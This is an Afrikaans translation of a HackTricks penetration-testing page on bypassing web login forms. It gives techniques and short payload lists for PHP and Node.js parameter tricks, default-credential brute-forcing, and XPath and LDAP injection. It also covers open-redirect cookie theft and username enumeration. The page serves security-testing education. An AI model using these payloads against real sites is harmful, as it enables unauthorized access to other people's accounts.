Login Bypass

Reading time: 4 minutes

tip

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks

Om gereelde aanmelding te omseil

As jy 'n aanmeldbladsy vind, kan jy hier 'n paar tegnieke vind om dit te probeer omseil:

  • Kyk vir kommentaar binne die bladsy (scroll af en na regs?)
  • Kyk of jy direk toegang tot die beperkte bladsye kan kry
  • Kyk om nie die parameters te stuur nie (stuur geen of net 1)
  • Kyk na die PHP vergelykingsfout: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b
  • Verander inhoud tipe na json en stuur json waardes (bool true ingesluit)
  • As jy 'n antwoord kry wat sê dat POST nie ondersteun word nie, kan jy probeer om die JSON in die liggaam te stuur maar met 'n GET versoek met Content-Type: application/json
  • Kyk na nodejs se potensiële ontledingsfout (lees hierdie): password[password]=1
  • Nodejs sal daardie payload omskep na 'n navraag soortgelyk aan die volgende: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; wat maak dat die wagwoord altyd waar is.
  • As jy 'n JSON objek kan stuur, kan jy "password":{"password": 1} stuur om die aanmelding te omseil.
  • Onthou dat jy om hierdie aanmelding te omseil steeds moet weet en 'n geldige gebruikersnaam stuur.
  • Voeg "stringifyObjects":true opsie by wanneer jy mysql.createConnection aanroep, sal uiteindelik alle onverwagte gedrag blokkeer wanneer Object in die parameter gestuur word.
  • Kyk na geloofsbriewe:
  • Standaard geloofsbriewe van die tegnologie/platform wat gebruik word
  • Gewone kombinasies (root, admin, wagwoord, naam van die tegnologie, standaard gebruiker met een van hierdie wagwoorde).
  • Skep 'n woordeboek met Cewl, voeg die standaard gebruikersnaam en wagwoord (indien daar is) by en probeer om dit te brute-force met al die woorde as gebruikersname en wagwoord
  • Brute-force met 'n groter woordeboek (Brute force)

SQL Injection aanmeld omseiling

Hier kan jy verskeie truuks vind om die aanmelding via SQL injections te omseil.

Op die volgende bladsy kan jy 'n aangepaste lys vind om te probeer om die aanmelding via SQL Injections te omseil:

Login bypass List

Geen SQL Injection aanmeld omseiling

Hier kan jy verskeie truuks vind om die aanmelding via Geen SQL Injections te omseil.

Aangesien die NoSQL Injections vereis dat die parameterwaarde verander word, sal jy dit handmatig moet toets.

XPath Injection aanmeld omseiling

Hier kan jy verskeie truuks vind om die aanmelding via XPath Injection. te omseil

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

LDAP Injection outentieke bypass

Hier kan jy verskeie truuks vind om die aanmelding via LDAP Injection te omseil.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Onthou My

As die bladsy "Onthou My" funksionaliteit het, kyk hoe dit geïmplementeer is en sien of jy dit kan misbruik om ander rekeninge oor te neem.

Oorplasings

Bladsye herlei gewoonlik gebruikers na aanmelding, kyk of jy daardie oorplasing kan verander om 'n Open Oorplasing te veroorsaak. Miskien kan jy 'n paar inligting (kodes, koekies...) steel as jy die gebruiker na jou webwerf herlei.

Ander Kontroles

  • Kyk of jy gebruikernames kan opnoem deur die aanmeldfunksionaliteit te misbruik.
  • Kyk of outo-voltooi aktief is in die wagwoord/sensitiewe inligting vorms invoer: <input autocomplete="false">

Outomatiese Gereedskap

tip

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks